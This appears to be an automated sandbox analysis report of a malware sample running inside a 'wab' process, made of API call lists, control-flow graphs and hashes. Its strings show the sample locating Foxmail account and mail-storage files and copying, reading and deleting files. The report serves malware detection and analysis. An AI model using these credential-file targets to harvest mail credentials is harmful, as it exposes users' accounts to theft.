                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 371C1579
                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 371C1585
                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 371C15AB
                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 371C15B7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                • API String ID: 672098462-2938083778
                                                                                                                                                • Opcode ID: 219ea2b03688ab3747b3fcebf4a586912e7ca8430e2b23b79eda4b05f15329f2
                                                                                                                                                • Instruction ID: 8494786cd89a90c4c8a162d8af478082eeaf4b2d06502e661c114c9547105a53
                                                                                                                                                • Opcode Fuzzy Hash: 219ea2b03688ab3747b3fcebf4a586912e7ca8430e2b23b79eda4b05f15329f2
                                                                                                                                                • Instruction Fuzzy Hash: D181E372A40358AAEB20DBE0DC45FEF7339EF84700F100596F509E7190EA765A84CF9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(371CC7DD), ref: 371CC7E6
                                                                                                                                                • GetModuleHandleA.KERNEL32(?,371CC7DD), ref: 371CC838
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 371CC860
                                                                                                                                                  • Part of subcall function 371CC803: GetProcAddress.KERNEL32(00000000,371CC7F4), ref: 371CC804
                                                                                                                                                  • Part of subcall function 371CC803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,371CC7F4,371CC7DD), ref: 371CC816
                                                                                                                                                  • Part of subcall function 371CC803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,371CC7F4,371CC7DD), ref: 371CC82A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                • Instruction ID: a2d2a942e81573c683ae07669fe17de807a4855a85133ba76e4163fb5a761d84
                                                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                • Instruction Fuzzy Hash: 7B01D26794538378BA12DEF40E03ABB5FD99B37EB0B101796E140C6193DAA49D06C3A6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 79 371cc7a7-371cc7bc 80 371cc82d 79->80 81 371cc7be-371cc7c6 79->81 82 371cc82f-371cc833 80->82 81->80 83 371cc7c8-371cc7f6 call 371cc7e6 81->83 84 371cc835-371cc83d GetModuleHandleA 82->84 85 371cc872 call 371cc877 82->85 91 371cc86c-371cc86e 83->91 92 371cc7f8 83->92 87 371cc83f-371cc847 84->87 87->87 90 371cc849-371cc84c 87->90 90->82 93 371cc84e-371cc850 90->93 96 371cc866-371cc86b 91->96 97 371cc870 91->97 94 371cc7fa-371cc7fe 92->94 95 371cc85b-371cc85e 92->95 98 371cc856-371cc85a 93->98 99 371cc852-371cc854 93->99 102 371cc865 94->102 103 371cc800-371cc80b GetProcAddress 94->103 100 371cc85f-371cc860 GetProcAddress 95->100 96->91 97->90 98->95 99->100 100->102 102->96 103->80 104 371cc80d-371cc81a VirtualProtect 103->104 105 371cc82c 104->105 106 371cc81c-371cc82a VirtualProtect 104->106 105->80 106->105
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(?,371CC7DD), ref: 371CC838
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 371CC860
                                                                                                                                                  • Part of subcall function 371CC7E6: GetModuleHandleA.KERNEL32(371CC7DD), ref: 371CC7E6
                                                                                                                                                  • Part of subcall function 371CC7E6: GetProcAddress.KERNEL32(00000000,371CC7F4), ref: 371CC804
                                                                                                                                                  • Part of subcall function 371CC7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,371CC7F4,371CC7DD), ref: 371CC816
                                                                                                                                                  • Part of subcall function 371CC7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,371CC7F4,371CC7DD), ref: 371CC82A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                • Instruction ID: 68f2bd5b770a6d4da61b71c3f52f44d24299796ed2670fb42e478578e69b7096
                                                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                • Instruction Fuzzy Hash: 7321E5774482836EFB12CEF44D067A76FD99B37AB0F190696D040CB142D6A89C45C3A6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 107 371cc803-371cc80b GetProcAddress 108 371cc82d 107->108 109 371cc80d-371cc81a VirtualProtect 107->109 110 371cc82f-371cc833 108->110 111 371cc82c 109->111 112 371cc81c-371cc82a VirtualProtect 109->112 113 371cc835-371cc83d GetModuleHandleA 110->113 114 371cc872 call 371cc877 110->114 111->108 112->111 115 371cc83f-371cc847 113->115 115->115 117 371cc849-371cc84c 115->117 117->110 118 371cc84e-371cc850 117->118 119 371cc856-371cc85e 118->119 120 371cc852-371cc854 118->120 121 371cc85f-371cc865 GetProcAddress 119->121 120->121 124 371cc866-371cc86e 121->124 126 371cc870 124->126 126->117
                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,371CC7F4), ref: 371CC804
                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,371CC7F4,371CC7DD), ref: 371CC816
                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,371CC7F4,371CC7DD), ref: 371CC82A
                                                                                                                                                • GetModuleHandleA.KERNEL32(?,371CC7DD), ref: 371CC838
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 371CC860
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2152742572-0
                                                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                • Instruction ID: 6e5f4e8d9378ae19bb69ad40c01591aa252ee331f8b8f94a0c797b50ed0d2166
                                                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                • Instruction Fuzzy Hash: CBF0AFA75453827CFA12CDF41E43AF75FCD8B37EB0B101A56A100C7182DA958D0683F6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 371C2645
                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 371C2710
                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 371C2730
                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 371C273A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                • Opcode ID: 05cbc3d1111deea4a6beaac92e47b9368793dcec8799544417cdcd02f702d8bf
                                                                                                                                                • Instruction ID: 0ecfc3e508e44907d567366fa2e123f4850f4fea3a1a050154acefff510a0cd4
                                                                                                                                                • Opcode Fuzzy Hash: 05cbc3d1111deea4a6beaac92e47b9368793dcec8799544417cdcd02f702d8bf
                                                                                                                                                • Instruction Fuzzy Hash: C4312776D4531D9BEB11DFA4C989BCDFBB8AF18300F1040AAE40DAB250EB759A858F45
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 371C2276
                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 371C2285
                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 371C228E
                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 371C229B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                • Opcode ID: a2e185d72ad73b768f46338c65191182c825b73278ecfe1d7a5378e1ee8a7eb4
                                                                                                                                                • Instruction ID: e803932102a5bbca03607d82f8f881841cb272ca28cd5045ffbac46f61d175ab
                                                                                                                                                • Opcode Fuzzy Hash: a2e185d72ad73b768f46338c65191182c825b73278ecfe1d7a5378e1ee8a7eb4
                                                                                                                                                • Instruction Fuzzy Hash: 88F05F71C50209EBDB00DBF4C54AA9EBBF8FF18305F9144959452F7140EB78AB269B51
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,371C2C3B,371CD1DC,00000017), ref: 371C2B21
                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(371CD1DC,?,371C2C3B,371CD1DC,00000017), ref: 371C2B2A
                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,371C2C3B,371CD1DC,00000017), ref: 371C2B35
                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,371C2C3B,371CD1DC,00000017), ref: 371C2B3C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3231755760-0
                                                                                                                                                • Opcode ID: e29e022f944260965f7bd8540ff52b7ec197147dd64be0cef11c20156ff82061
                                                                                                                                                • Instruction ID: 00f5c77d596ebf68ff54d96ff05c83700f941349370c1787835d2f72bb29c060
                                                                                                                                                • Opcode Fuzzy Hash: e29e022f944260965f7bd8540ff52b7ec197147dd64be0cef11c20156ff82061
                                                                                                                                                • Instruction Fuzzy Hash: 46D01233084205ABE7002BE8CD0EA593F28FF04212FC00004FB4AB2040DB398433CB55
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 371C61DA
                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 371C61E4
                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 371C61F1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                • Opcode ID: 3f9271e0209726e72eef67910a40e740adf265d7722ef15331b84130fc59b177
                                                                                                                                                • Instruction ID: 1300b9314276ba1488b9c79175d775e13354fae6fc0bf97d3fede12395f184fe
                                                                                                                                                • Opcode Fuzzy Hash: 3f9271e0209726e72eef67910a40e740adf265d7722ef15331b84130fc59b177
                                                                                                                                                • Instruction Fuzzy Hash: CB31067595121D9BCB21DF68C8887CDBBB8FF18310F5041EAE81CA7260EB349B928F45
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,371C4A8A,?,371D2238,0000000C,371C4BBD,00000000,00000000,00000001,371C2082,371D2108,0000000C,371C1F3A,?), ref: 371C4AD5
                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,371C4A8A,?,371D2238,0000000C,371C4BBD,00000000,00000000,00000001,371C2082,371D2108,0000000C,371C1F3A,?), ref: 371C4ADC
                                                                                                                                                • ExitProcess.KERNEL32 ref: 371C4AEE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                • Opcode ID: 9a2b76e8c42e6acb148a39197db967049185ade8c575a5dde4dbfc12fa00f966
                                                                                                                                                • Instruction ID: 991bb06217132d72313f5bf947f9ee800d84be933d4705478806f6715a9bf941
                                                                                                                                                • Opcode Fuzzy Hash: 9a2b76e8c42e6acb148a39197db967049185ade8c575a5dde4dbfc12fa00f966
                                                                                                                                                • Instruction Fuzzy Hash: 72E01A37004106AFDB02AF98C909A493F2AAF10751B504014FD4666020CB39D963DB44
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 371C294C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                • Opcode ID: 56c28c69f55a4e64c6fb80c572d9ccb6916786844fc0e80d8c4deb513e36133c
                                                                                                                                                • Instruction ID: 81fa7205c3e87949e39af4ce18b1eedf97e8fed603d96b8528b460474d1f2033
                                                                                                                                                • Opcode Fuzzy Hash: 56c28c69f55a4e64c6fb80c572d9ccb6916786844fc0e80d8c4deb513e36133c
                                                                                                                                                • Instruction Fuzzy Hash: FA414BB2D02206DBEB11CF94C5826AAFBF4FB48320F54866AD405F7264D378AA51CF60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                • Opcode ID: f7f167bd5e0ae5288bceb0998d83ebbcc9fac25ef2519992480d1530b6f07f4d
                                                                                                                                                • Instruction ID: 9d5c4a9cf5de3b1689ea145e2bae6f001da0a1a70df7959fe6941fd72455aab6
                                                                                                                                                • Opcode Fuzzy Hash: f7f167bd5e0ae5288bceb0998d83ebbcc9fac25ef2519992480d1530b6f07f4d
                                                                                                                                                • Instruction Fuzzy Hash: F3A01132A82203CFAB008F38820B20C3AACAA0828038000A8A808E0000EB2880328B0A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 371C1D1B
                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 371C1D37
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 371C1D4B
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 371C1D58
                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 371C1D72
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 371C1D7D
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 371C1D8A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1454806937-0
                                                                                                                                                • Opcode ID: 5febb2c52e0e40c36fbc56a63e29a423072414ec24ee1057c97d59cadfaf29cd
                                                                                                                                                • Instruction ID: ab3680f629045917fd30f31b4b47e605073c9a582e4a40776db777ecfaa6b670
                                                                                                                                                • Opcode Fuzzy Hash: 5febb2c52e0e40c36fbc56a63e29a423072414ec24ee1057c97d59cadfaf29cd
                                                                                                                                                • Instruction Fuzzy Hash: 23217CB298121EAFE710DBE48C8DEEA7AACFF18354F4005A5F501F2140DA789E569B70
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 224 371c39be-371c39c8 225 371c3a6e-371c3a71 224->225 226 371c39cd-371c39dd 225->226 227 371c3a77 225->227 228 371c39df-371c39e2 226->228 229 371c39ea-371c3a03 LoadLibraryExW 226->229 230 371c3a79-371c3a7d 227->230 231 371c39e8 228->231 232 371c3a6b 228->232 233 371c3a55-371c3a5e 229->233 234 371c3a05-371c3a0e GetLastError 229->234 235 371c3a67-371c3a69 231->235 232->225 233->235 236 371c3a60-371c3a61 FreeLibrary 233->236 237 371c3a45 234->237 238 371c3a10-371c3a22 call 371c55f6 234->238 235->232 240 371c3a7e-371c3a80 235->240 236->235 239 371c3a47-371c3a49 237->239 238->237 244 371c3a24-371c3a36 call 371c55f6 238->244 239->233 242 371c3a4b-371c3a53 239->242 240->230 242->232 244->237 247 371c3a38-371c3a43 LoadLibraryExW 244->247 247->239
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                • API String ID: 0-537541572
                                                                                                                                                • Opcode ID: 54b42a670a63fc7e16cfecd86225b3644e90531f99725f39e85c0df047b873d9
                                                                                                                                                • Instruction ID: 89742fdbdf4e52b23c3d084a384fded8b2019f7e1a3a651a3f56a420f2d0943e
                                                                                                                                                • Opcode Fuzzy Hash: 54b42a670a63fc7e16cfecd86225b3644e90531f99725f39e85c0df047b873d9
                                                                                                                                                • Instruction Fuzzy Hash: 9F11EB77A41713ABE712C6E88CC5B1A7B685F29FB0F550150E946F7280DB34E921C6E3
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 371C1038
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 371C104B
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 371C1061
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 371C1075
                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 371C1090
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 371C10B8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3594823470-0
                                                                                                                                                • Opcode ID: e00cb810d277907388485a39fdc00990742934c783f101b5a66a2662c4a8f0e3
                                                                                                                                                • Instruction ID: 1b0f3c8fbbc6b211f2fc21f206e528a7eadd4e3bafc3618bb92051c6b44834eb
                                                                                                                                                • Opcode Fuzzy Hash: e00cb810d277907388485a39fdc00990742934c783f101b5a66a2662c4a8f0e3
                                                                                                                                                • Instruction Fuzzy Hash: E821D3B794031A9BDF50DAE4DC48EDF3729EF44324F104296E895A31A1DF349AA6CB41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 371C1E89: lstrlenW.KERNEL32(?,?,?,?,?,371C10DF,?,?,?,00000000), ref: 371C1E9A
                                                                                                                                                  • Part of subcall function 371C1E89: lstrcatW.KERNEL32(?,?), ref: 371C1EAC
                                                                                                                                                  • Part of subcall function 371C1E89: lstrlenW.KERNEL32(?,?,371C10DF,?,?,?,00000000), ref: 371C1EB3
                                                                                                                                                  • Part of subcall function 371C1E89: lstrlenW.KERNEL32(?,?,371C10DF,?,?,?,00000000), ref: 371C1EC8
                                                                                                                                                  • Part of subcall function 371C1E89: lstrcatW.KERNEL32(?,371C10DF), ref: 371C1ED3
                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 371C122A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                • API String ID: 1475205934-1520055953
                                                                                                                                                • Opcode ID: d2e4257b24c9d5dbbcd743d15bf0935e2ce2b8f83b1373c1df6f94f3be98a778
                                                                                                                                                • Instruction ID: 3c83d116d7723b7df1734a85744e1717889740902b6010fe3a119b8c529f2b8c
                                                                                                                                                • Opcode Fuzzy Hash: d2e4257b24c9d5dbbcd743d15bf0935e2ce2b8f83b1373c1df6f94f3be98a778
                                                                                                                                                • Instruction Fuzzy Hash: 8F2195BAA502086BEB10D7D4EC81FFD733AEF50714F100556F605EB1D0EAB55E818B5A
